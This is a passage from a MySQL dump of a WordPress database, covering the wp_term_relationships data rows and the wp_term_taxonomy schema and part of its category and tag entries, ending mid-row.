`term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_order` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`object_id`,`term_taxonomy_id`),
KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_relationships`
--
LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (4,2,0),(4,3,0),(4,4,0),(4,5,0),(4,6,0),(4,529,0),(4,552,0),(4,566,0),(4,575,0),(6,9,0),(6,10,0),(6,11,0),(6,519,0),(6,537,0),(6,552,0),(6,566,0),(10,3,0),(10,14,0),(10,15,0),(10,16,0),(10,524,0),(10,529,0),(10,552,0),(10,566,0),(10,575,0),(12,18,0),(12,19,0),(12,20,0),(12,528,0),(12,529,0),(12,552,0),(12,566,0),(12,574,0),(15,21,0),(15,22,0),(15,23,0),(15,517,0),(15,519,0),(15,552,0),(15,566,0),(17,27,0),(17,28,0),(17,29,0),(17,30,0),(17,31,0),(17,532,0),(17,552,0),(17,566,0),(22,32,0),(22,33,0),(22,524,0),(22,529,0),(22,552,0),(22,566,0),(40,37,0),(40,38,0),(40,39,0),(40,40,0),(40,41,0),(40,42,0),(40,518,0),(40,544,0),(40,545,0),(40,554,0),(40,567,0),(42,43,0),(42,44,0),(42,45,0),(42,46,0),(42,47,0),(42,529,0),(42,554,0),(42,567,0),(42,574,0),(43,22,0),(43,49,0),(43,50,0),(43,51,0),(43,52,0),(43,53,0),(43,54,0),(43,517,0),(43,519,0),(43,554,0),(43,567,0),(44,56,0),(44,57,0),(44,58,0),(44,59,0),(44,60,0),(44,531,0),(44,538,0),(44,554,0),(44,567,0),(45,63,0),(45,64,0),(45,65,0),(45,66,0),(45,68,0),(45,522,0),(45,552,0),(45,566,0),(46,14,0),(46,70,0),(46,71,0),(46,72,0),(46,73,0),(46,74,0),(46,529,0),(46,552,0),(46,566,0),(46,575,0),(47,75,0),(47,77,0),(47,78,0),(47,80,0),(47,532,0),(47,552,0),(47,566,0),(48,83,0),(48,84,0),(48,85,0),(48,86,0),(48,87,0),(48,544,0),(48,552,0),(48,565,0),(49,88,0),(49,89,0),(49,90,0),(49,91,0),(49,518,0),(49,545,0),(49,552,0),(49,565,0),(50,93,0),(50,94,0),(50,95,0),(50,96,0),(50,97,0),(50,544,0),(50,546,0),(50,552,0),(50,565,0),(51,98,0),(51,99,0),(51,100,0),(51,522,0),(51,552,0),(51,565,0),(52,102,0),(52,103,0),(52,104,0),(52,105,0),(52,106,0),(52,517,0),(52,519,0),(52,552,0),(52,565,0),(53,108,0),(53,109,0),(53,113,0),(53,537,0),(53,552,0),(53,565,0),(54,43,0),(54,114,0),(54,115,0),(54,116,0),(54,117,0),(54,529,0),(54,552,0),(54,565,0),(54,574,0),(54,575,0),(55,119,0),(55,120,0),(55,121,0),(55,122,0),(55,123,0),(55,124,0),(55,125,0),(55,126,0),(55,524,0),(55,526,0),(55,529,0),(55,530,0),(55,553,0),(55,567,0),(56,127,0),(56,128,0),(56,129,0),(56,529,0),(56,553,0),(56,567,0),(56,574,0),(56,645,0),(57,132,0),(57,133,0),(57,134,0),(57,135,0),(57,136,0),(57,521,0),(57,523,0),(57,554,0),(57,567,0),(58,128,0),(58,137,0),(58,138,0),(58,139,0),(58,524,0),(58,527,0),(58,554,0),(58,567,0),(59,142,0),(59,143,0),(59,144,0),(59,145,0),(59,146,0),(59,147,0),(59,533,0),(59,554,0),(59,567,0),(60,148,0),(60,149,0),(60,150,0),(60,151,0),(60,528,0),(60,553,0),(60,567,0),(61,152,0),(61,153,0),(61,154,0),(61,533,0),(61,552,0),(61,566,0),(62,155,0),(62,156,0),(62,157,0),(62,158,0),(62,517,0),(62,519,0),(62,553,0),(62,567,0),(63,159,0),(63,160,0),(63,161,0),(63,162,0),(63,163,0),(63,164,0),(63,522,0),(63,529,0),(63,552,0),(63,566,0),(63,574,0),(64,166,0),(64,167,0),(64,168,0),(64,542,0),(64,553,0),(64,567,0),(65,170,0),(65,173,0),(65,245,0),(65,246,0),(65,517,0),(65,518,0),(65,552,0),(65,566,0),(66,175,0),(66,176,0),(66,177,0),(66,178,0),(66,179,0),(66,180,0),(66,517,0),(66,518,0),(66,553,0),(66,567,0),(67,181,0),(67,182,0),(67,183,0),(67,184,0),(67,537,0),(67,553,0),(67,566,0),(69,185,0),(69,187,0),(69,189,0),(69,247,0),(69,517,0),(69,518,0),(69,553,0),(69,567,0),(70,190,0),(70,191,0),(70,192,0),(70,193,0),(70,522,0),(70,553,0),(70,567,0),(71,194,0),(71,195,0),(71,196,0),(71,197,0),(71,528,0),(71,553,0),(71,567,0),(73,198,0),(73,199,0),(73,201,0),(73,529,0),(73,553,0),(73,567,0),(74,202,0),(74,203,0),(74,204,0),(74,205,0),(74,519,0),(74,553,0),(74,566,0),(75,207,0),(75,208,0),(75,209,0),(75,210,0),(75,211,0),(76,215,0),(76,216,0),(76,217,0),(76,553,0),(76,566,0),(76,645,0),(77,219,0),(77,220,0),(77,221,0),(77,222,0),(77,223,0),(77,529,0),(77,553,0),(77,566,0),(77,579,0),(78,225,0),(78,226,0),(78,227,0),(78,228,0),(78,229,0),(78,526,0),(78,529,0),(78,553,0),(78,566,0),(78,578,0),(78,579,0),(79,230,0),(79,231,0),(79,232,0),(79,233,0),(79,234,0),(79,517,0),(79,519,0),(79,553,0),(79,567,0),(80,237,0),(80,238,0),(80,239,0),(80,280,0),(80,519,0),(80,553,0),(80,567,0),(80,643,0),(81,240,0),(81,244,0),(81,517,0),(81,518,0),(81,553,0),(81,567,0),(115,249,0),(115,250,0),(115,253,0),(115,553,0),(115,567,0),(115,646,0),(117,81,0),(117,254,0),(117,255,0),(117,257,0),(117,258,0),(117,259,0),(117,260,0),(117,521,0),(117,523,0),(117,553,0),(117,567,0),(118,262,0),(118,263,0),(118,265,0),(118,266,0),(118,522,0),(118,529,0),(118,552,0),(118,566,0),(120,268,0),(120,269,0),(120,270,0),(120,271,0),(120,273,0),(120,531,0),(120,552,0),(120,566,0),(121,274,0),(121,275,0),(121,276,0),(121,277,0),(121,278,0),(121,279,0),(121,517,0),(121,519,0),(121,552,0),(121,566,0),(134,256,0),(134,281,0),(134,282,0),(134,283,0),(134,374,0),(134,522,0),(134,554,0),(134,568,0),(135,284,0),(135,285,0),(135,286,0),(135,287,0),(135,288,0),(135,523,0),(135,554,0),(135,568,0),(138,259,0),(138,289,0),(138,290,0),(138,291,0),(138,517,0),(138,519,0),(138,554,0),(138,568,0),(139,196,0),(139,292,0),(139,293,0),(139,294,0),(139,528,0),(139,554,0),(139,568,0),(141,120,0),(141,296,0),(141,297,0),(141,298,0),(141,524,0),(141,525,0),(141,554,0),(141,568,0),(143,72,0),(143,299,0),(143,300,0),(143,301,0),(143,529,0),(143,554,0),(143,568,0),(143,575,0),(144,302,0),(144,303,0),(144,304,0),(144,305,0),(144,517,0),(144,519,0),(144,554,0),(144,568,0),(146,306,0),(146,307,0),(146,308,0),(146,309,0),(146,310,0),(146,522,0),(146,554,0),(146,568,0),(148,312,0),(148,313,0),(148,314,0),(148,315,0),(148,554,0),(148,568,0),(148,654,0),(150,316,0),(150,317,0),(150,318,0),(150,319,0),(150,517,0),(150,518,0),(150,554,0),(150,568,0),(152,320,0),(152,321,0),(152,322,0),(152,323,0),(152,324,0),(152,376,0),(152,377,0),(152,517,0),(152,519,0),(152,555,0),(152,568,0),(152,605,0),(153,326,0),(153,327,0),(153,328,0),(153,329,0),(153,330,0),(153,524,0),(153,526,0),(153,554,0),(153,568,0),(155,331,0),(155,332,0),(155,333,0),(155,334,0),(155,517,0),(155,519,0),(155,555,0),(155,568,0),(156,335,0),(156,336,0),(156,337,0),(156,338,0),(156,517,0),(156,518,0),(156,554,0),(156,568,0),(158,171,0),(158,339,0),(158,340,0),(158,341,0),(158,537,0),(158,555,0),(158,568,0),(160,342,0),(160,343,0),(160,344,0),(160,345,0),(160,517,0),(160,519,0),(160,554,0),(160,568,0),(162,346,0),(162,347,0),(162,348,0),(162,349,0),(162,523,0),(162,529,0),(162,555,0),(162,568,0),(162,574,0),(164,351,0),(164,352,0),(164,353,0),(164,355,0),(164,375,0),(164,536,0),(164,555,0),(164,568,0),(165,357,0),(165,358,0),(165,359,0),(165,360,0),(165,361,0),(165,555,0),(165,568,0),(167,14,0),(167,299,0),(167,362,0),(167,363,0),(167,364,0),(167,529,0),(167,555,0),(167,568,0),(167,575,0),(169,89,0),(169,365,0),(169,366,0),(169,367,0),(169,517,0),(169,519,0),(169,545,0),(169,554,0),(169,568,0),(171,265,0),(171,368,0),(171,369,0),(171,370,0),(171,529,0),(171,554,0),(171,568,0),(171,574,0),(173,89,0),(173,371,0),(173,372,0),(173,373,0),(173,517,0),(173,519,0),(173,545,0),(173,554,0),(173,568,0),(195,378,0),(196,378,0),(199,380,0),(199,381,0),(199,382,0),(199,555,0),(199,569,0),(199,605,0),(200,257,0),(200,383,0),(200,384,0),(200,395,0),(200,523,0),(200,555,0),(200,569,0),(201,319,0),(201,385,0),(201,386,0),(201,542,0),(201,555,0),(201,569,0),(202,392,0),(202,393,0),(202,394,0),(202,542,0),(202,555,0),(202,569,0),(203,389,0),(203,390,0),(203,391,0),(203,542,0),(203,555,0),(203,569,0),(211,231,0),(211,396,0),(211,397,0),(211,398,0),(211,517,0),(211,519,0),(211,555,0),(211,569,0),(212,1,0),(212,398,0),(212,402,0),(212,418,0),(212,419,0),(212,420,0),(212,517,0),(213,22,0),(213,398,0),(213,421,0),(213,422,0),(213,520,0),(214,1,0),(214,413,0),(214,414,0),(214,423,0),(214,517,0),(215,413,0),(215,424,0),(215,425,0),(215,517,0),(217,22,0),(217,397,0),(217,399,0),(217,517,0),(217,519,0),(217,555,0),(217,569,0),(218,400,0),(218,401,0),(218,402,0),(218,522,0),(218,548,0),(218,555,0),(218,569,0),(219,386,0),(219,403,0),(219,555,0),(219,569,0),(220,405,0),(220,406,0),(220,407,0),(220,555,0),(220,569,0),(221,401,0),(221,408,0),(221,521,0),(221,522,0),(221,555,0),(221,569,0),(231,22,0),(231,409,0),(231,410,0),(231,411,0),(231,412,0),(231,517,0),(231,556,0),(231,569,0),(233,413,0),(233,414,0),(233,415,0),(233,416,0),(233,417,0),(233,521,0),(233,523,0),(233,555,0),(233,569,0),(236,22,0),(236,397,0),(236,426,0),(236,427,0),(236,517,0),(238,406,0),(238,419,0),(238,428,0),(238,556,0),(238,569,0),(238,643,0),(240,38,0),(240,397,0),(240,429,0),(240,430,0),(240,517,0),(240,518,0),(240,556,0),(240,569,0),(241,432,0),(241,433,0),(241,524,0),(241,529,0),(241,556,0),(241,569,0),(250,434,0),(250,435,0),(250,436,0),(250,437,0),(250,438,0),(250,439,0),(250,531,0),(250,536,0),(250,556,0),(252,435,0),(252,440,0),(252,441,0),(252,442,0),(252,443,0),(252,517,0),(252,519,0),(252,556,0),(252,570,0),(254,38,0),(254,435,0),(254,444,0),(254,445,0),(254,446,0),(254,447,0),(254,518,0),(254,519,0),(254,556,0),(254,570,0),(256,448,0),(256,449,0),(256,450,0),(256,451,0),(256,452,0),(256,529,0),(256,556,0),(256,570,0),(256,574,0),(256,579,0),(258,435,0),(258,453,0),(258,454,0),(258,455,0),(258,456,0),(258,457,0),(258,517,0),(258,556,0),(258,570,0),(260,20,0),(260,458,0),(260,459,0),(260,460,0),(260,461,0),(260,529,0),(260,556,0),(260,570,0),(260,574,0),(262,443,0),(262,460,0),(262,461,0),(262,462,0),(262,463,0),(262,519,0),(262,545,0),(262,556,0),(262,570,0),(265,443,0),(265,461,0),(265,464,0),(265,465,0),(265,466,0),(265,517,0),(265,519,0),(265,556,0),(265,570,0),(267,451,0),(267,460,0),(267,461,0),(267,467,0),(267,468,0),(267,519,0),(267,528,0),(267,556,0),(267,570,0),(269,461,0),(269,465,0),(269,466,0),(269,469,0),(269,470,0),(269,529,0),(269,556,0),(269,570,0),(269,574,0),(269,579,0),(272,397,0),(272,471,0),(272,517,0),(272,519,0),(272,556,0),(272,570,0),(273,432,0),(273,458,0),(273,472,0),(273,529,0),(273,556,0),(273,570,0),(273,574,0),(274,518,0),(274,556,0),(274,570,0),(275,22,0),(275,397,0),(275,473,0),(275,517,0),(275,518,0),(275,519,0),(275,556,0),(275,570,0),(276,474,0),(276,475,0),(276,544,0),(276,545,0),(276,546,0),(276,556,0),(276,570,0),(294,477,0),(294,478,0),(294,479,0),(294,480,0),(294,529,0),(294,556,0),(294,570,0),(294,576,0),(295,22,0),(295,481,0),(295,517,0),(295,557,0),(295,570,0),(302,398,0),(302,413,0),(302,488,0),(302,523,0),(302,557,0),(302,570,0),(310,432,0),(310,487,0),(310,522,0),(310,529,0),(310,557,0),(310,570,0),(310,574,0),(313,81,0),(313,489,0),(313,490,0),(313,491,0),(313,492,0),(313,557,0),(313,571,0),(323,496,0),(323,497,0),(323,502,0),(323,503,0),(323,504,0),(323,505,0),(323,506,0),(323,507,0),(323,508,0),(323,509,0),(323,544,0),(323,557,0),(323,571,0),(325,493,0),(325,498,0),(325,505,0),(325,506,0),(325,529,0),(325,557,0),(325,571,0),(325,574,0),(325,594,0),(325,595,0),(325,596,0),(325,597,0),(325,598,0),(325,599,0),(325,600,0),(327,499,0),(327,504,0),(327,505,0),(327,506,0),(327,510,0),(327,511,0),(327,512,0),(327,513,0),(327,514,0),(327,515,0),(327,516,0),(327,545,0),(327,557,0),(327,571,0),(328,402,0),(328,413,0),(328,500,0),(328,501,0),(328,505,0),(328,506,0),(328,523,0),(328,557,0),(328,571,0),(328,581,0),(328,582,0),(328,583,0),(328,584,0),(328,585,0),(328,586,0),(328,587,0),(341,557,0),(341,571,0),(341,605,0),(341,606,0),(341,607,0),(341,608,0),(341,609,0),(341,610,0),(341,611,0),(341,612,0),(341,613,0),(341,614,0),(341,615,0),(342,504,0),(342,519,0),(342,557,0),(342,571,0),(342,590,0),(342,614,0),(342,616,0),(342,617,0),(342,618,0),(342,619,0),(342,620,0),(342,621,0),(342,622,0),(347,81,0),(347,120,0),(347,506,0),(347,524,0),(347,526,0),(347,557,0),(347,571,0),(347,614,0),(347,656,0),(347,657,0),(347,658,0),(347,659,0),(347,660,0),(347,661,0),(347,662,0),(347,663,0),(348,38,0),(348,504,0),(348,518,0),(348,557,0),(348,571,0),(348,593,0),(348,614,0),(348,664,0),(348,665,0),(348,666,0),(348,667,0),(348,668,0),(348,669,0),(356,81,0),(356,505,0),(356,520,0),(356,557,0),(356,571,0),(356,601,0),(356,602,0),(356,603,0),(356,670,0),(356,671,0),(356,672,0),(356,673,0),(356,674,0),(356,675,0),(356,676,0),(356,677,0),(356,678,0),(361,506,0),(361,519,0),(361,557,0),(361,571,0),(361,614,0),(361,623,0),(361,679,0),(361,680,0),(361,681,0),(361,682,0),(361,683,0),(361,684,0),(361,685,0),(366,506,0),(366,524,0),(366,526,0),(366,529,0),(366,557,0),(366,571,0),(366,614,0),(366,626,0),(366,721,0),(366,722,0),(366,723,0),(366,724,0),(366,725,0),(366,726,0),(366,727,0),(366,728,0),(367,557,0),(367,571,0),(367,605,0),(367,631,0),(367,729,0),(367,730,0),(367,731,0),(367,732,0),(367,733,0),(367,734,0),(367,735,0),(367,736,0),(367,737,0),(367,738,0),(381,504,0),(381,521,0),(381,557,0),(381,571,0),(381,636,0),(381,637,0),(381,638,0),(381,739,0),(381,740,0),(381,741,0),(381,742,0),(381,743,0),(381,744,0),(381,745,0),(391,504,0),(391,534,0),(391,557,0),(391,571,0),(391,746,0),(391,747,0),(391,748,0),(391,749,0),(391,750,0),(391,751,0),(391,752,0),(391,753,0),(391,754,0),(411,506,0),(411,528,0),(411,557,0),(411,571,0),(411,614,0),(411,639,0),(411,755,0),(411,756,0),(411,757,0),(411,758,0),(411,759,0),(411,760,0),(420,504,0),(420,505,0),(420,521,0),(420,522,0),(420,523,0),(420,542,0),(420,557,0),(420,571,0),(420,761,0),(420,762,0),(420,763,0),(420,764,0),(420,765,0),(420,766,0),(420,767,0),(420,768,0),(420,769,0),(421,504,0),(421,538,0),(421,557,0),(421,571,0),(421,614,0),(421,649,0),(421,800,0),(421,801,0),(421,802,0),(421,803,0),(421,804,0),(421,805,0),(421,806,0),(440,378,0),(442,378,0),(443,378,0),(449,505,0),(449,506,0),(449,517,0),(449,519,0),(449,557,0),(449,571,0),(449,686,0),(449,848,0),(449,849,0),(449,850,0),(449,851,0),(449,852,0),(450,546,0),(450,558,0),(450,571,0),(450,689,0),(450,690,0),(450,853,0),(450,854,0),(450,855,0),(450,856,0),(450,857,0),(450,858,0),(450,865,0),(450,866,0),(451,506,0),(451,528,0),(451,558,0),(451,571,0),(451,692,0),(451,865,0),(451,867,0),(451,868,0),(451,869,0),(451,870,0),(451,871,0),(453,34,0),(454,34,0),(455,34,0),(457,34,0),(459,34,0),(460,34,0),(464,34,0),(466,34,0),(496,559,0),(496,571,0),(496,655,0),(496,695,0),(496,897,0),(496,898,0),(496,899,0),(496,900,0),(496,901,0),(496,902,0),(496,903,0),(496,904,0),(497,559,0),(497,571,0),(497,605,0),(497,700,0),(497,905,0),(497,906,0),(497,907,0),(497,908,0),(497,909,0),(497,910,0),(498,382,0),(498,605,0),(498,701,0),(498,703,0),(499,1,0),(499,645,0),(499,704,0),(499,705,0),(499,706,0),(499,707,0),(500,398,0),(500,413,0),(500,430,0),(500,522,0),(500,708,0),(500,709,0),(500,710,0),(501,38,0),(501,518,0),(501,711,0),(501,712,0),(502,520,0),(502,713,0),(502,714,0),(502,715,0),(502,716,0),(503,504,0),(503,505,0),(503,528,0),(503,557,0),(503,571,0),(503,717,0),(503,718,0),(503,811,0),(503,812,0),(503,813,0),(503,814,0),(503,815,0),(503,816,0),(505,505,0),(505,506,0),(505,557,0),(505,571,0),(505,645,0),(505,720,0),(505,817,0),(505,818,0),(505,819,0),(505,820,0),(505,821,0),(505,822,0),(505,823,0),(524,289,0),(524,386,0),(524,413,0),(524,542,0),(524,770,0),(525,430,0),(525,432,0),(525,528,0),(525,771,0),(525,772,0),(526,386,0),(526,542,0),(526,705,0),(526,773,0),(526,774,0),(527,407,0),(527,413,0),(527,522,0),(527,775,0),(527,776,0),(527,777,0),(528,522,0),(528,705,0),(528,778,0),(528,779,0),(528,780,0),(528,781,0),(529,438,0),(529,536,0),(529,782,0),(529,783,0),(529,784,0),(529,785,0),(530,529,0),(531,207,0),(531,776,0),(531,786,0),(531,787,0),(531,788,0),(531,789,0),(532,644,0),(532,790,0),(532,791,0),(532,792,0),(532,793,0),(533,518,0),(533,794,0),(533,797,0),(533,798,0),(533,799,0),(534,398,0),(534,519,0),(534,795,0),(534,796,0),(535,22,0),(535,422,0),(535,519,0),(535,807,0),(535,808,0),(540,413,0),(540,414,0),(540,523,0),(540,809,0),(540,810,0),(545,81,0),(545,824,0),(545,825,0),(545,826,0),(545,827,0),(546,386,0),(546,430,0),(546,542,0),(546,828,0),(546,829,0),(546,830,0),(546,831,0),(547,413,0),(547,430,0),(547,522,0),(547,832,0),(548,22,0),(548,397,0),(548,398,0),(548,519,0),(548,712,0),(548,776,0),(548,833,0),(548,834,0),(548,835,0),(549,22,0),(549,398,0),(549,519,0),(549,836,0),(549,837,0),(550,1,0),(550,517,0),(550,838,0),(550,839,0),(550,840,0),(550,841,0),(550,842,0),(550,843,0),(553,605,0),(553,701,0),(553,844,0),(553,845,0),(553,846,0),(553,847,0),(558,398,0),(558,407,0),(558,430,0),(558,518,0),(558,644,0),(558,859,0),(559,398,0),(559,414,0),(559,523,0),(559,860,0),(559,861,0),(560,20,0),(560,432,0),(560,451,0),(560,574,0),(560,862,0),(560,863,0),(560,864,0),(564,398,0),(564,425,0),(564,522,0),(564,872,0),(564,873,0),(566,534,0),(566,874,0),(566,875,0),(566,876,0),(566,877,0),(566,878,0),(567,432,0),(567,451,0),(567,579,0),(567,879,0),(567,880,0),(567,881,0),(568,526,0),(568,882,0),(568,883,0),(568,884,0),(568,885,0),(569,430,0),(569,546,0),(569,712,0),(569,886,0),(569,887,0),(569,888,0),(570,407,0),(570,644,0),(570,889,0),(570,890,0),(570,891,0),(570,892,0),(572,407,0),(572,644,0),(572,893,0),(572,894,0),(572,895,0),(572,896,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_taxonomy`
--
DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
`term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`taxonomy` varchar(32) NOT NULL DEFAULT '',
`description` longtext NOT NULL,
`parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_taxonomy_id`),
UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=911 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_taxonomy`
--
LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,3),(2,2,'post_tag','',0,1),(3,3,'post_tag','',0,2),(4,4,'post_tag','',0,1),(5,5,'post_tag','',0,1),(6,6,'post_tag','',0,1),(9,9,'post_tag','',0,1),(10,10,'post_tag','',0,1),(11,11,'post_tag','',0,1),(14,14,'post_tag','',0,3),(15,15,'post_tag','',0,1),(16,16,'post_tag','',0,1),(18,18,'post_tag','',0,1),(19,19,'post_tag','',0,1),(20,20,'post_tag','',0,2),(21,21,'post_tag','',0,1),(22,22,'post_tag','',0,10),(23,23,'post_tag','',0,1),(27,27,'post_tag','',0,1),(28,28,'post_tag','',0,1),(29,29,'post_tag','',0,1),(30,30,'post_tag','',0,1),(31,31,'post_tag','',0,1),(32,32,'post_tag','',0,1),(33,33,'post_tag','',0,1),(34,34,'nav_menu','',0,8),(37,37,'post_tag','',0,1),(38,38,'post_tag','',0,4),(39,39,'post_tag','',0,1),(40,40,'post_tag','',0,1),(41,41,'post_tag','',0,1),(42,42,'post_tag','',0,1),(43,43,'post_tag','',0,2),(44,44,'post_tag','',0,1),(45,45,'post_tag','',0,1),(46,46,'post_tag','',0,1),(47,47,'post_tag','',0,1),(49,49,'post_tag','',0,1),(50,50,'post_tag','',0,1),(51,51,'post_tag','',0,1),(52,52,'post_tag','',0,1),(53,53,'post_tag','',0,1),(54,54,'post_tag','',0,1),(56,56,'post_tag','',0,1),(57,57,'post_tag','',0,1),(58,58,'post_tag','',0,1),(59,59,'post_tag','',0,1),(60,60,'post_tag','',0,1),(63,63,'post_tag','',0,1),(64,64,'post_tag','',0,1),(65,65,'post_tag','',0,1),(66,66,'post_tag','',0,1),(67,67,'post_tag','',0,0),(68,68,'post_tag','',0,1),(69,69,'post_tag','',0,0),(70,70,'post_tag','',0,1),(71,71,'post_tag','',0,1),(72,72,'post_tag','',0,2),(73,73,'post_tag','',0,1),(74,74,'post_tag','',0,1),(75,75,'post_tag','',0,1),(76,76,'post_tag','',0,0),(77,77,'post_tag','',0,1),(78,78,'post_tag','',0,1),(79,79,'post_tag','',0,0),(80,80,'post_tag','',0,1),(81,81,'category','',0,5),(83,83,'post_tag','',0,1),(84,84,'post_tag','',0,1),(85,85,'post_tag','',0,1),(86,86,'post_tag','',0,1),(87,87,'post_tag','',0,1),(88,88,'post_tag','',0,1),(89,89,'post_tag','',0,3),(90,90,'post_tag','',0,1),(91,91,'post_tag','',0,1),(93,93,'post_tag','',0,1),(94,94,'post_tag','',0,1),(95,95,'post_tag','',0,1),(96,96,'post_tag','',0,1),(97,97,'post_tag','',0,1),(98,98,'post_tag','',0,1),(99,99,'post_tag','',0,1),(100,100,'post_tag','',0,1),(101,101,'post_tag','',0,0),(102,102,'post_tag','',0,1),(103,103,'post_tag','',0,1),(104,104,'post_tag','',0,1),(105,105,'post_tag','',0,1),(106,106,'post_tag','',0,1),(108,108,'post_tag','',0,1),(109,109,'post_tag','',0,1),(110,110,'post_tag','',0,0),(111,111,'post_tag','',0,0),(112,112,'post_tag','',0,0),(113,113,'post_tag','',0,1),(114,114,'post_tag','',0,1),(115,115,'post_tag','',0,1),(116,116,'post_tag','',0,1),(117,117,'post_tag','',0,1),(119,119,'post_tag','',0,1),(120,120,'post_tag','',0,3),(121,121,'post_tag','',0,1),(122,122,'post_tag','',0,1),(123,123,'post_tag','',0,1),(124,124,'post_tag','',0,1),(125,125,'post_tag','',0,1),(126,126,'post_tag','',0,1),(127,127,'post_tag','',0,1),(128,128,'post_tag','',0,2),(129,129,'post_tag','',0,1),(132,132,'post_tag','',0,1),(133,133,'post_tag','',0,1),(134,134,'post_tag','',0,1),(135,135,'post_tag','',0,1),(136,136,'post_tag','',0,1),(137,137,'post_tag','',0,1),(138,138,'post_tag','',0,1),(139,139,'post_tag','',0,1),(142,142,'post_tag','',0,1),(143,143,'post_tag','',0,1),(144,144,'post_tag','',0,1),(145,145,'post_tag','',0,1),(146,146,'post_tag','',0,1),(147,147,'post_tag','',0,1),(148,148,'post_tag','',0,1),(149,149,'post_tag','',0,1),(150,150,'post_tag','',0,1),(151,151,'post_tag','',0,1),(152,152,'post_tag','',0,1),(153,153,'post_tag','',0,1),(154,154,'post_tag','',0,1),(155,155,'post_tag','',0,1),(156,156,'post_tag','',0,1),(157,157,'post_tag','',0,1),(158,158,'post_tag','',0,1),(159,159,'post_tag','',0,1),(160,160,'post_tag','',0,1),(161,161,'post_tag','',0,1),(162,162,'post_tag','',0,1),(163,163,'post_tag','',0,1),(164,164,'post_tag','',0,1),(166,166,'post_tag','',0,1),(167,167,'post_tag','',0,1),(168,168,'post_tag','',0,1),(170,170,'post_tag','',0,1),(171,171,'post_tag','',0,1),(172,172,'post_tag','',0,0),(173,173,'post_tag','',0,1),(174,174,'post_tag','',0,0),(175,175,'post_tag','',0,1),(176,176,'post_tag','',0,1),(177,177,'post_tag','',0,1),(178,178,'post_tag','',0,1),(179,179,'post_tag','',0,1),(180,180,'post_tag','',0,1),(181,181,'post_tag','',0,1),(182,182,'post_tag','',0,1),(183,183,'post_tag','',0,1),(184,184,'post_tag','',0,1),(185,185,'post_tag','',0,1),(186,186,'post_tag','',0,0),(187,187,'post_tag','',0,1),(188,188,'post_tag','',0,0),(189,189,'post_tag','',0,1),(190,190,'post_tag','',0,1),(191,191,'post_tag','',0,1),(192,192,'post_tag','',0,1),(193,193,'post_tag','',0,1),(194,194,'post_tag','',0,1),(195,195,'post_tag','',0,1),(196,196,'post_tag','',0,2),(197,197,'post_tag','',0,1),(198,198,'post_tag','',0,1),(199,199,'post_tag','',0,1),(200,200,'post_tag','',0,0),(201,201,'post_tag','',0,1),(202,202,'post_tag','',0,1),(203,203,'post_tag','',0,1),(204,204,'post_tag','',0,1),(205,205,'post_tag','',0,1),(206,206,'post_tag','',0,0),(207,207,'category','',0,2),(208,208,'post_tag','',0,1),(209,209,'post_tag','',0,1),(210,210,'post_tag','',0,1),(211,211,'post_tag','',0,1),(212,212,'post_tag','',0,0),(213,213,'post_tag','',0,0),(215,215,'post_tag','',0,1),(216,216,'post_tag','',0,1),(217,217,'post_tag','',0,1),(219,219,'post_tag','',0,1),(220,220,'post_tag','',0,1),(221,221,'post_tag','',0,1),(222,222,'post_tag','',0,1),(223,223,'post_tag','',0,1),(225,225,'post_tag','',0,1),(226,226,'post_tag','',0,1),(227,227,'post_tag','',0,1),(228,228,'post_tag','',0,1),(229,229,'post_tag','',0,1),(230,230,'post_tag','',0,1),(231,231,'post_tag','',0,2),(232,232,'post_tag','',0,1),(233,233,'post_tag','',0,1),(234,234,'post_tag','',0,1),(235,235,'post_tag','',0,0),(236,236,'post_tag','',0,0),(237,237,'post_tag','',0,1),(238,238,'post_tag','',0,1),(239,239,'post_tag','',0,1),(240,240,'post_tag','',0,1),(241,241,'post_tag','',0,0),(242,242,'post_tag','',0,0),(243,243,'post_tag','',0,0),(244,244,'post_tag','',0,1),(245,245,'post_tag','',0,1),(246,246,'post_tag','',0,1),(247,247,'post_tag','',0,1),(249,249,'post_tag','',0,1),(250,250,'post_tag','',0,1),(251,251,'post_tag','',0,0),(252,252,'post_tag','',0,0),(253,253,'post_tag','',0,1),(254,254,'post_tag','',0,1),(255,255,'post_tag','',0,1),(256,256,'post_tag','',0,1),(257,257,'post_tag','',0,2),(258,258,'post_tag','',0,1),(259,259,'post_tag','',0,2),(260,260,'post_tag','',0,1),(261,261,'post_tag','',0,0),(262,262,'post_tag','',0,1),(263,263,'post_tag','',0,1),(264,264,'post_tag','',0,0),(265,265,'post_tag','',0,2),(266,266,'post_tag','',0,1),(268,268,'post_tag','',0,1),(269,269,'post_tag','',0,1),(270,270,'post_tag','',0,1),(271,271,'post_tag','',0,1),(272,272,'post_tag','',0,0),(273,273,'post_tag','',0,1),(274,274,'post_tag','',0,1),(275,275,'post_tag','',0,1),(276,276,'post_tag','',0,1),(277,277,'post_tag','',0,1),(278,278,'post_tag','',0,1),(279,279,'post_tag','',0,1),(280,280,'post_tag','',0,1),(281,281,'post_tag','',0,1),(282,282,'post_tag','',0,1),(283,283,'post_tag','',0,1),(284,284,'post_tag','',0,1),(285,285,'post_tag','',0,1),(286,286,'